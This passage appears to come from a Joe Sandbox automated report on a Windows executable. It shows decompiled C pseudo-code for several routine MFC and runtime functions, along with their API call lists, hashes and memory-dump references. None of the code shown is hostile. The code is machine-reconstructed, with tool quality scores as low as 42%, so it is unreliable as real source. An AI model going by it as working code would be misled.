						}
					}
				}
				return _t3;
			}

APIs

GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

GetParent.USER32(00000000), ref: 0041A8DE

Part of subcall function 0041A759: GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
Part of subcall function 0041A759: lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794

GetWindowLongA.USER32 ref: 0041A8F9
GetParent.USER32(?), ref: 0041A907
GetDesktopWindow.USER32 ref: 0041A90B
SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041A91F

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
String ID:
API String ID: 2818563221-0
Opcode ID: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
Instruction ID: 0ef3fffee83f5250149677f0c627e80be30cc9893a9c62ed2a9ad1800b3459ea
Opcode Fuzzy Hash: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
Instruction Fuzzy Hash: 27F0F9712022212AD23127355C4CBEF53689F86B58F5A0527F411E62D0EB1CDDD241AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7CE, Relevance: 9.0, APIs: 6, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041A7CE(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t22;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t22 = GetWindow();
					if(_t22 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t22) == 0xffff || (GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) == 0) {
						L5:
						_push(2);
						_push(_t22);
						continue;
					} else {
						GetWindowRect(_t22,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t22;
						}
						goto L5;
					}
				}
				return 0;
			}

APIs

ClientToScreen.USER32(?,?), ref: 0041A7DD
GetWindow.USER32(?,00000005), ref: 0041A7EE
GetDlgCtrlID.USER32 ref: 0041A7F7
GetWindowLongA.USER32 ref: 0041A806
GetWindowRect.USER32 ref: 0041A818
PtInRect.USER32(?,?,?), ref: 0041A828

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
Instruction ID: 073ddf0fe74a93c2ca18b2cdbf6cccc684bfe4d9908968ef648256188d18c8f8
Opcode Fuzzy Hash: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
Instruction Fuzzy Hash: AE017C31201119BBDB21AB649C08EEF776CEF54710F804531F911D51A0E734D963CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A586, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 207
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A586() {
				int _v8;
				char* _v12;
				void* __ecx;
				char* _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				char* _t27;
				char _t29;
				char _t30;
				signed int _t32;
				char _t34;
				void* _t35;
				char _t36;
				void* _t37;
				signed int _t39;
				signed int _t40;
				char* _t43;
				char* _t46;
				intOrPtr _t47;
				void* _t56;
				signed int _t60;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				void* _t70;
				char* _t74;
				char* _t76;
				signed int** _t80;
				intOrPtr _t86;
				intOrPtr _t88;

				_push(_t55);
				_t70 = 0xc;
				_v12 = 0;
				E004079D4(_t70);
				 *0x4373d8 =  *0x4373d8 | 0xffffffff;
				 *0x4373c8 =  *0x4373c8 | 0xffffffff;
				 *0x439f08 = 0;
				 *_t80 = 0x42f6a8;
				_t74 = E0040B475();
				_t56 = _t69;
				if(_t74 != 0) {
					if( *_t74 == 0) {
						L41:
						_t18 = E00407A35(_t70);
					} else {
						_t19 =  *0x439fbc; // 0x0
						if(_t19 == 0) {
							L18:
							E004062E0( *0x439fbc);
							_t23 = E00405667(E00405A40(_t74) + 1);
							 *0x439fbc = _t23;
							if(_t23 == 0) {
								goto L41;
							} else {
								E00409B00(_t23, _t74);
								E00407A35(_t70);
								E0040AD30( *0x4373bc, _t74, 3);
								_t27 =  *0x4373bc; // 0x43733c
								_t76 = _t74 + 3;
								_t27[3] = _t27[3] & 0x00000000;
								if( *_t76 == 0x2d) {
									_v12 = 1;
									_t76 = _t76 + 1;
								}
								_t60 = E004068F6(_t56, _t76) * 0xe10;
								 *0x437330 = _t60;
								while(1) {
									_t29 =  *_t76;
									if(_t29 != 0x2b && (_t29 < 0x30 || _t29 > 0x39)) {
										break;
									}
									_t76 = _t76 + 1;
								}
								if( *_t76 == 0x3a) {
									_t76 = _t76 + 1;
									_t32 = E004068F6(_t60, _t76);
									_t63 =  *0x437330; // 0x7080
									_t60 = _t63 + _t32 * 0x3c;
									 *0x437330 = _t60;
									while(1) {
										_t34 =  *_t76;
										if(_t34 < 0x30 || _t34 > 0x39) {
											break;
										}
										_t76 = _t76 + 1;
									}
									if( *_t76 == 0x3a) {
										_t76 = _t76 + 1;
										_t35 = E004068F6(_t60, _t76);
										_t65 =  *0x437330; // 0x7080
										_t60 = _t65 + _t35;
										 *0x437330 = _t60;
										while(1) {
											_t36 =  *_t76;
											if(_t36 < 0x30 || _t36 > 0x39) {
												goto L36;
											}
											_t76 = _t76 + 1;
										}
									}
								}
								L36:
								if(_v12 != 0) {
									 *0x437330 =  ~_t60;
								}
								_t30 =  *_t76;
								 *0x437334 = _t30;
								if(_t30 == 0) {
									goto L40;
								} else {
									E0040AD30( *0x4373c0, _t76, 3);
									_t18 =  *0x4373c0; // 0x43737c
									_t18[3] = _t18[3] & 0x00000000;
								}
							}
						} else {
							_t37 = E00409A70(_t74, _t19);
							_pop(_t56);
							if(_t37 == 0) {
								goto L41;
							} else {
								goto L18;
							}
						}
					}
				} else {
					E00407A35(_t70);
					 *_t80 = 0x439f10;
					_t18 = GetTimeZoneInformation(??);
					if(_t18 != 0xffffffff) {
						_t39 =  *0x439f10; // 0x0
						_t67 =  *0x439f64; // 0x0
						_t40 = _t39 * 0x3c;
						_t86 =  *0x439f56; // 0x0
						_t68 = 1;
						 *0x437330 = _t40;
						 *0x439f08 = _t68;
						if(_t86 != 0) {
							 *0x437330 = _t40 + _t67 * 0x3c;
						}
						_t88 =  *0x439faa; // 0x0
						if(_t88 == 0) {
							L7:
							 *0x437334 = 0;
							 *0x437338 = 0;
						} else {
							_t47 =  *0x439fb8; // 0x0
							if(_t47 == 0) {
								goto L7;
							} else {
								 *0x437334 = _t68;
								 *0x437338 = (_t47 - _t67) * 0x3c;
							}
						}
						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f14, 0xffffffff,  *0x4373bc, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							_t43 =  *0x4373bc; // 0x43733c
							 *_t43 =  *_t43 & 0x00000000;
						} else {
							_t46 =  *0x4373bc; // 0x43733c
							_t46[0x3f] = _t46[0x3f] & 0x00000000;
						}
						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f68, 0xffffffff,  *0x4373c0, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							L40:
							_t18 =  *0x4373c0; // 0x43737c
							 *_t18 =  *_t18 & 0x00000000;
						} else {
							_t18 =  *0x4373c0; // 0x43737c
							_t18[0x3f] = _t18[0x3f] & 0x00000000;
						}
					}
				}
				return _t18;
			}

APIs

Part of subcall function 004079D4: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A11
Part of subcall function 004079D4: EnterCriticalSection.KERNEL32(?,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A2C

Part of subcall function 00407A35: LeaveCriticalSection.KERNEL32(?,004056C9,00000009,?,00000009,00000000,?,00405689,000000E0,00405676,?,004079F4,00000018,00000000,?), ref: 00407A42

GetTimeZoneInformation.KERNEL32(0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A5D4
WideCharToMultiByte.KERNEL32(00000220,00439F14,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A66A
WideCharToMultiByte.KERNEL32(00000220,00439F68,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A6A3

Strings

<sC, xrefs: 0040A675, 0040A680, 0040A72A
|sC, xrefs: 0040A6B6, 0040A7E9, 0040A7F7

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
String ID: <sC$|sC
API String ID: 3442286286-4181122796
Opcode ID: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
Instruction ID: b677b28e1722a814c3f057f402e4873ea4966b7f4bec670f8581aa156dfe752d
Opcode Fuzzy Hash: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
Instruction Fuzzy Hash: BC61D7B15083409AD7319F29AC85B6A3BA9E701314F24613FFCC1A72E1D7788D62D75E

Uniqueness

Uniqueness Score: -1.00%

Function 00413E4C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413E4C(intOrPtr* __ecx) {
				struct HWND__* _v36;
				struct HWND__* _v40;
				signed char _v44;
				void* _v48;
				long _t33;
				long _t41;
				struct HWND__* _t46;
				signed char _t58;
				intOrPtr* _t61;
				signed int _t62;
				void* _t67;
				intOrPtr _t69;
				intOrPtr* _t70;

				_t70 = __ecx;
				_t67 = E004126FB();
				if(_t67 != 0) {
					if( *((intOrPtr*)(_t67 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t67 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t67 + 0x20)) == _t70) {
						 *((intOrPtr*)(_t67 + 0x20)) = 0;
					}
				}
				_t61 =  *((intOrPtr*)(_t70 + 0x30));
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 0x50))();
					 *((intOrPtr*)(_t70 + 0x30)) = 0;
				}
				_t62 =  *(_t70 + 0x34);
				_t58 = 1;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 4))(_t58);
				}
				 *(_t70 + 0x34) =  *(_t70 + 0x34) & 0x00000000;
				if(( *(_t70 + 0x24) & _t58) != 0) {
					_t69 =  *((intOrPtr*)(E004249C4() + 0xcc));
					if(_t69 != 0 &&  *(_t69 + 0x1c) != 0) {
						E00406330( &_v48, 0, 0x2c);
						_t46 =  *(_t70 + 0x1c);
						_v40 = _t46;
						_v36 = _t46;
						_v48 = 0x28;
						_v44 = _t58;
						SendMessageA( *(_t69 + 0x1c), 0x405, 0,  &_v48);
					}
				}
				_t33 = GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc);
				E004136A7(_t70);
				if(GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc) == _t33) {
					_t41 =  *( *((intOrPtr*)( *_t70 + 0x80))());
					if(_t41 != 0) {
						SetWindowLongA( *(_t70 + 0x1c), 0xfffffffc, _t41);
					}
				}
				E004137BE(_t70);
				return  *((intOrPtr*)( *_t70 + 0xa4))();
			}

APIs

SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00413F05
GetWindowLongA.USER32 ref: 00413F16
GetWindowLongA.USER32 ref: 00413F26
SetWindowLongA.USER32 ref: 00413F42

Strings

(, xrefs: 00413EF0

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
Instruction ID: dd2e24bc71a940e73787925e98583bd3eaf246f1b6150e13293b1a1c05b6b2eb
Opcode Fuzzy Hash: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
Instruction Fuzzy Hash: 3131C1306003109FDB20AF69D884BAEBBB4BF44315F10416EE54297791DB79ED85CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004264D7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004264D7(void* __ecx, void* __eflags) {
				CHAR* _v8;
				char _v268;
				char _v528;
				char _v784;
				void* __ebp;
				signed char* _t35;
				intOrPtr _t39;
				intOrPtr _t43;
				CHAR* _t54;
				void* _t62;
				intOrPtr* _t63;
				void* _t64;

				_t55 = __ecx;
				_t64 = __ecx;
				_t62 = E00424BFB();
				 *(_t62 + 8) =  *(_t64 + 0x68);
				 *(_t62 + 0xc) =  *(_t64 + 0x68);
				GetModuleFileNameA( *(_t64 + 0x68),  &_v528, 0x104);
				_t35 = E004072C1(_t55,  &_v528, 0x2e);
				 *_t35 =  *_t35 & 0x00000000;
				_v8 = _t35;
				E004265F4( &_v528,  &_v268, 0x104);
				if( *((intOrPtr*)(_t64 + 0x88)) == 0) {
					 *((intOrPtr*)(_t64 + 0x88)) = E004065EE( &_v268);
				}
				if( *((intOrPtr*)(_t64 + 0x78)) == 0) {
					if(E00417298(0xe000,  &_v784, 0x100) == 0) {
						_push( *((intOrPtr*)(_t64 + 0x88)));
					} else {
						_push( &_v784);
					}
					 *((intOrPtr*)(_t64 + 0x78)) = E004065EE();
				}
				_t39 =  *((intOrPtr*)(_t64 + 0x78));
				 *((intOrPtr*)(_t62 + 0x10)) = _t39;
				_t63 = _t64 + 0x8c;
				if( *((intOrPtr*)(_t64 + 0x8c)) == 0) {
					_t54 = _v8;
					lstrcpyA(_t54, ".HLP");
					_t39 = E004065EE( &_v528);
					 *_t63 = _t39;
					 *_t54 =  *_t54 & 0x00000000;
				}
				if( *((intOrPtr*)(_t64 + 0x90)) == 0) {
					lstrcatA( &_v268, ".INI");
					_t43 = E004065EE( &_v268);
					 *((intOrPtr*)(_t64 + 0x90)) = _t43;
					return _t43;
				}
				return _t39;
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508

Part of subcall function 004265F4: lstrlenA.KERNEL32(00000104,00000000,?,00426538), ref: 0042662B

lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6

Strings

.HLP, xrefs: 004265A3
.INI, xrefs: 004265D0

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: FileModuleNamelstrcatlstrcpylstrlen
String ID: .HLP$.INI
API String ID: 2421895198-3011182340
Opcode ID: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
Instruction ID: 868c022bf07a7b2e93be295e1be440ce3fbd708987d9fcb65685db64fa447996
Opcode Fuzzy Hash: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
Instruction Fuzzy Hash: 31316071904718AFDB21DB75EC85B86B7FCAB04304F5049ABE18AD3141DB74AAC4CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA5F(intOrPtr __ecx, void* __eflags, CHAR* _a4, int _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				int _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				char _v280;
				struct HWND__* _t23;
				signed int _t32;
				intOrPtr _t34;
				long _t36;
				int _t38;
				intOrPtr _t41;
				CHAR* _t42;
				int _t43;
				long _t44;

				_t41 = __ecx;
				_v20 = __ecx;
				E0041BA31(0);
				_t23 = E0041BBD7(0,  &_v8);
				_t44 = 0;
				_v16 = _t23;
				if(_t23 == 0) {
					L3:
					if(_t41 != 0) {
						_t5 = _t41 + 0x9c; // 0x9c
						_t44 = _t5;
					}
					L5:
					_v12 = 0;
					if(_t44 != 0) {
						_v12 =  *_t44;
						_t34 = _a12;
						if(_t34 != 0) {
							 *_t44 = _t34 + 0x30000;
						}
					}
					_t38 = _a8;
					if((_t38 & 0x000000f0) == 0) {
						_t32 = _t38 & 0x0000000f;
						if(_t32 <= 1 || _t32 > 2 && _t32 <= 4) {
							_t38 = _t38 | 0x00000030;
						}
					}
					if(_t41 == 0) {
						_t42 =  &_v280;
						GetModuleFileNameA(0,  &_v280, 0x104);
					} else {
						_t42 =  *(_t41 + 0x78);
					}
					_t43 = MessageBoxA(_v16, _a4, _t42, _t38);
					if(_t44 != 0) {
						 *_t44 = _v12;
					}
					if(_v8 != 0) {
						EnableWindow(_v8, 1);
					}
					E0041BA31(1);
					return _t43;
				}
				_t36 = SendMessageA(_v8, 0x376, 0, 0);
				if(_t36 == 0) {
					goto L3;
				} else {
					_t44 = _t36;
					goto L5;
				}
			}

APIs

Part of subcall function 0041BBD7: GetParent.USER32(?), ref: 0041BC0A
Part of subcall function 0041BBD7: GetLastActivePopup.USER32(?), ref: 0041BC19
Part of subcall function 0041BBD7: IsWindowEnabled.USER32(?), ref: 0041BC2E
Part of subcall function 0041BBD7: EnableWindow.USER32(?,00000000), ref: 0041BC41

SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0041BA95
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0041BB03
MessageBoxA.USER32 ref: 0041BB11
EnableWindow.USER32(00000000,00000001), ref: 0041BB2D

Strings

]hA, xrefs: 0041BA5F

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID: ]hA
API String ID: 1958756768-937096280
Opcode ID: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
Instruction ID: 4165363e149cbbf7c392989b56a322b27346b80c9b900e92cfd844e3d8e78dc3
Opcode Fuzzy Hash: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
Instruction Fuzzy Hash: E1217E72A00208AFDB209FA5CCC1BEEB7B9EF44784F54046AE654E7250D7799D81CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00406388, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 83%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				signed int _t27;
				signed int _t35;
				intOrPtr _t52;

				_t47 = __edi;
				_push(0xffffffff);
				_push(0x42f100);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(__edi);
				_v28 = _t52 - 0x58;
				_t15 = GetVersion();
				 *0x439d04 = 0;
				_t35 = _t15 & 0x000000ff;
				 *0x439d00 = _t35;
				 *0x439cfc = _t35 << 8;
				 *0x439cf8 = _t15 >> 0x10;
				if(E0040796F(1) == 0) {
					E004064B5(0x1c);
				}
				if(E00408DEC() == 0) {
					E004064B5(0x10);
				}
				_v8 = 0;
				E0040963B();
				 *0x43b87c = GetCommandLineA();
				 *0x439ce8 = E00409509();
				E004092BC();
				E00409203();
				E00406619();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E004091AB();
				_t56 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t27 = 0xa;
				} else {
					_t27 = _v96.wShowWindow & 0x0000ffff;
				}
				_v100 = E0040EC99(GetModuleHandleA(0), 0, _v104, _t27);
				E00406646(_t29);
				_t31 = _v24;
				_t40 =  *((intOrPtr*)( *_v24));
				_v108 =  *((intOrPtr*)( *_v24));
				return E00409033(_t47, _t56, _t40, _t31);
			}

APIs

GetVersion.KERNEL32 ref: 004063AE

Part of subcall function 0040796F: HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980
Part of subcall function 0040796F: HeapDestroy.KERNEL32 ref: 0040799E

GetCommandLineA.KERNEL32 ref: 0040640E
GetStartupInfoA.KERNEL32(?), ref: 00406439
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040645C

Part of subcall function 004064B5: ExitProcess.KERNEL32 ref: 004064D2

Strings

`3K, xrefs: 00406414

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID: `3K
API String ID: 2057626494-2733895450
Opcode ID: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
Instruction ID: c51f859c3b4423f550283f3a037e6d2f417254e4b3c57e688e880ffcfc58db2c
Opcode Fuzzy Hash: 8203cef856ffdf5330fa23f021acb3231cccc4167ef851cc0875824ae4c609d5
Instruction Fuzzy Hash: 952174B1940715AAD718AFB6EC46A6D7BB8EF44704F10453FF902AA2D2DB7C4811CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 004219DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004219DB(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t29;
				int _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				int _t42;
				intOrPtr* _t45;
				void* _t46;

				_t45 = __ecx;
				_t29 = E00414DCC(__ecx);
				_t40 =  *((intOrPtr*)(_t45 + 0x68));
				_t42 = _a4;
				_t38 = _t29;
				if(_t40 == 0) {
					L2:
					if(_a8 != 0xffff) {
						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
							 *(_t45 + 0x90) =  *(_t45 + 0x90) & 0x00000000;
							goto L17;
						} else {
							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
								if(_t42 < 0xff00) {
									goto L13;
								}
								 *(_t45 + 0x90) = 0xef1f;
								goto L17;
							} else {
								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
								L13:
								 *(_t45 + 0x90) = _t42;
								L17:
								 *(_t38 + 0x24) =  *(_t38 + 0x24) | 0x00000040;
								L18:
								_t30 =  *(_t45 + 0x90);
								if(_t30 ==  *((intOrPtr*)(_t45 + 0x94))) {
									L21:
									return _t30;
								}
								_t30 = E00413740(_t46, GetParent( *(_t45 + 0x1c)));
								if(_t30 == 0) {
									goto L21;
								}
								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
							}
						}
					}
					 *(_t45 + 0x24) =  *(_t45 + 0x24) & 0xffffffbf;
					if( *((intOrPtr*)(_t38 + 0x50)) != 0) {
						 *(_t45 + 0x90) = 0xe002;
					} else {
						 *(_t45 + 0x90) = 0xe001;
					}
					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0x90), 0);
					_t35 =  *((intOrPtr*)( *_t45 + 0xd4))();
					if(_t35 != 0) {
						UpdateWindow( *(_t35 + 0x1c));
					}
					goto L18;
				}
				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
				if(_t30 != 0) {
					goto L21;
				}
				goto L2;
			}

APIs

SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 00421A41
UpdateWindow.USER32(?), ref: 00421A58
GetParent.USER32(?), ref: 00421AC3
PostMessageA.USER32 ref: 00421ADF

Strings

@, xrefs: 00421AAE

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Message$ParentPostSendUpdateWindow
String ID: @
API String ID: 4141989945-2766056989
Opcode ID: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
Instruction ID: c85c597f5e24639da506447a35e2af01adcbf593c53045394c0a427bdb2bd247
Opcode Fuzzy Hash: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
Instruction Fuzzy Hash: 6931B131702711AFDB304F60E848B6B77B5BF60315F51493FE55A562B1C779A881DB08

Uniqueness

Uniqueness Score: -1.00%

Function 00414364, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00414364(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t25;
				void* _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t40;
				CHAR* _t42;

				_t42 = E004249C4() + 0x58;
				_t25 = E00424BFB();
				_t37 = _a8;
				_t40 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37 || _a16 != _t37) {
					wsprintfA(_t42, "Afx:%x:%x:%x:%x:%x", _t40, _a4, _t37, _a12, _a16);
				} else {
					wsprintfA(_t42, "Afx:%x:%x", _t40, _a4);
				}
				if(GetClassInfoA(_t40, _t42,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
